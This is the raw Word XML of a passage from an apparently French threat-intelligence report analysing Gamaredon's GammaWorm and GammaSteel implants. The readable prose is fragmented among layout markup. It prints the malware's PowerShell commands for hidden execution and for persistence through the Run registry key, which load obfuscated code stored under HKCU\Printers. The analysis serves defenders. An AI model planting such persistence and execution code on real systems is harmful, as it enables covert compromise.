            <wp:wrapNone/>
            <wp:docPr id="2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40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Comparaison avec GammaWorm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0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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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L'architecture générale est très proche de celle de GammaWorm. Les deux implants utilisent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1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5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">un </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="12"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Dead Drop Resolver</w:t>
                        </w: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, collectent une empreinte de la machine et exécutent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2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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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dynamiquement du VBScript reçu depuis un serveur distant. La philosophie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3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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonctionnement est donc identique, mais plusieurs différences d'implémentation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4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1929153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="874036" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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403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apparaissent.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5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2204108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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La première concerne le point d'entrée du DDR. GammaWorm utilise un canal Telegram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6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2377463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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public puis extrait une adresse IP obfusquée, tandis que ce script interroge directement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2550818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3055452" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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545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page Telegra.ph et en extrait une URL complète.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8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2825773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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La seconde différence réside dans la persistance de la configuration. GammaWorm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9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2999128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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maintient l'ensem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ble de ses informations réseau dans plusieurs clés du registre Windows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0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3192803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1936" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>965834</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3191098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771398" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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139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HKCU\Console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), permettant une résolution récursive de plusieurs points d'entrée C2.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2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3387748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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script étudié adopte une approche beaucoup plus simple en stockant uniquement deux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3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3558170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3682883" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8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valeurs dans les fichiers </w:t>
                        </w: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desktopc.ini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 </w:t>
                        </w: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desktopt.ini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5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3824637</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3158080" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8080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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.4GammaSteel : exfiltration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6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4228488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2634675" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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46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Gamaredon utilise désormais l’API DPAPI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7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4503443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Après le déchiffrement initial, le script utilise un mécanisme spécifique pour re-chiffrer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4676798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonction à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 l’aide de l’API DPAPI (Da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ta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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Protection API) de Windows. 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En exploitant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9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4870473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="641017" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0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fonctions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0128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3570605</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4868768</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3166628" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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662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ConvertFrom-SecureString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sans spécifier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1152" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1524634</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4868768</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2063468" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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34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ConvertTo-SecureString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2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5065418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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clé, le code lie le chiffrement à la session de l’utilisateur actuel. Cela garantit que les charges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3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5238773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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utiles générées dans le registre ne peuvent être déchiffrées que par l’utilisateur connecté sur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4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5412128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’hôte compromis, ce qui complique l’analyse forensique si les bases du registre sont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5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5585483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3069701" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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970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exfiltrées sans les clés principales de l’utilisateur.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6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5860438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4211050" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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10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C’est la première fois que Gamaredon utilise cette technique (TTP).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7296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6130315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1696310" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6310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4.4.1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L'orchestrateur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6442733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Une fonction spécifique fait offi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ce d’orchestrateu</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">r pour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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">. À l’instar des autre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9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6634703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonctions, elle est stockée dans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HKCU\Printers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sous la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KeZdDboas5kpxbkgxxvBx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0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6831353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Ce composant est chargé de gérer les 70 autres fonctions déployées. Avant d’entrer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1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7004708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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les détails de sa logique interne, il convient de souligner la méthodologie employée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2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7178063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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déclencher cet orchestrateur, garantissant à la fois une exécution immédiate et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3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7351418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1603829" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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38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persistance à long terme.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4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7626373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Pour lancer l’orchestrateur, le code instancie un processus Powershell détaché et caché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5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7799728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2068890" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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88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l’aide de la commande suivante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6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8092422</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4878539" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8539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Start-Process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FilePath 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"powershell"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ArgumentList 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"-noexit"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7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8247362</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5114759" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4759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'powershell.exe -nol -nop -enc [PAYLOAD EXECUTING ORCHESTRATOR]'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8402302</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1598129" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8129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WindowStyle </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle61"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Hidden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9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8577603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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 charge utile codée ordonne à ce nouveau processus fils de lire le registre, de récupérer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0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8750958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonction de l’orchestrateur, de la déchiffrer via DPAPI et de l’exécuter en mémoire. Cela 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1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8924313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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permis de dissocier l’orchestrateur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initial, lui permettant ainsi de s’exécuter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2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9097668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3436274" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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62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tant que tâche indépendante et cachée en arrière-plan.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3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9372623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Parallèlement, le code assure sa persistance en installant une tâche conçue pour relancer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4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9545978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’orchestrateur au démarrage du système. Il écrit une commande Powershell spécifique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572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675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77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982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790848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1692284</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="502919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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50291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502919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5029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187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3836044</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="812799"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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812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81279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812799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8127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2896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1692284</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="502919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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50291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502919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5029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3920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3836044</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="812799"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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812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81279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812799"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8127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6208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1692919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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502285">
                          <a:moveTo>
                            <a:pt x="3174" y="50228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50228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0304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3836679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="812165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8121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812165">
                          <a:moveTo>
                            <a:pt x="3174" y="812165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="808990"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="808990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="808990"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="808990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="81216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4400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1692919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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502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502285">
                          <a:moveTo>
                            <a:pt x="3174" y="502285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="499110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="499110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="50228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6448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3836679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="812165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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121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12165">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="81216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8496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3836679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="812165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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121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12165">
                          <a:moveTo>
                            <a:pt x="0" y="81216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2592" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1285240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4130039" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3003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3003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4129405" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4129405" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="413003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6688" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2706370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1206509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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00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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60960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38976" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3721100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2471429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2900679" cy="629919"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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00679" cy="62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00679" h="629919">
                          <a:moveTo>
                            <a:pt x="634" y="629919"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="430529"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2900044" y="430529"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2900044" y="629919"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2900679" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="696595" y="414019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="696595" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1795145" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1795145" y="414019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="695959" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1795779" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="958214" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="958214" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1238884" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1238884" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="957579" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="123952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1024" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3800475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5549909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3072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5549909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5120" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2327275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5938529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7168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5938529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9216" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5724524</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6777999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1264" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4215765</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6777999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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228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331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4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976218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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la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HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run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, en utilisant le nom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5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1191483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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du système d’exploitation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$env:os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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) comme nom de valeur afin de se fondre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6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1388133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1099233" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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92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l’environnement.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7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1680827</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4956263" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6263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powershell.exe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 </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle61"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">hidden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command 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$a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='HKCU:\Printers'; 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$b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=Get-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8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1835767</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4173175" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3175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ItemProperty -Path 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$a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 -Name 'YxwHku2chu0bznt3kkyAB';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9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1990707</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4957914" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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791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$c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$b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.YxwHku2chu0bznt3kkyAB; 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$d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=[scriptblock]::Create(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$c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); &amp;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$d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2456403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Plutôt que de stocker la charge utile complète dans la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Run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, cette entrée fait office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1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2671668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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pointeur. Elle reconstitue le chemin obfusqué menant à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HKCU\Printers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récupère le code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2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2886933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’orchestrateur stocké dans la clé distincte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HKCU\Printers\YxwHku2chu0bznt3kkyAB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3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3083583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="920417" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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04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puis l’exécute.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4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3358538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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D’autre part, elle lit cette clé de registre nouvellement créée et l’exécute à l’aide du code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5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3531893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="556079" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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07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suivant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6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3824587</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5112823" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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12823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powershell.exe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 </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle61"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">hidden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command 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$HIBdqts3rtuonnvozqAjU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 = (Get-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7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3979527</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3313067" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3067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ItemProperty -Path 'HKCU:\Printers' -Name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8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4134467</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5660669" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0669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'YxwHku2chu0bznt3kkyAB').YxwHku2chu0bznt3kkyAB; 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$zCZZm1uyck0njfsnFPli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 =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9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4289407</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4878190" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8190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[scriptblock]::Create(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$HIBdqts3rtuonnvozqAjU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); Invoke-Command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4444347</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2769704" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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970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-ScriptBlock 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$zCZZm1uyck0njfsnFPli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1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4894603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Ce mécanisme de persistance est reproduit au sein même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 pour un effet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2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5067958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4893904" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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939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immédiat. Le code récupère explicitement la même clé de registre et l’exécute.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3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5342913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Cette séquence, qui consiste à configu</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="27"/>
                          </w:rPr>
                          <w:t xml:space="preserve">rer la clé de registre de persistance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481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5534883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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HKCU\Printers\YxwHku2chu0bznt3kkyAB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 et à forcer l’exécution immédiate de son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5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5731533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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contenu, est encapsulé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 dans un dernier bloc de variables déclenché par une commande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686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5923503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2850220" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
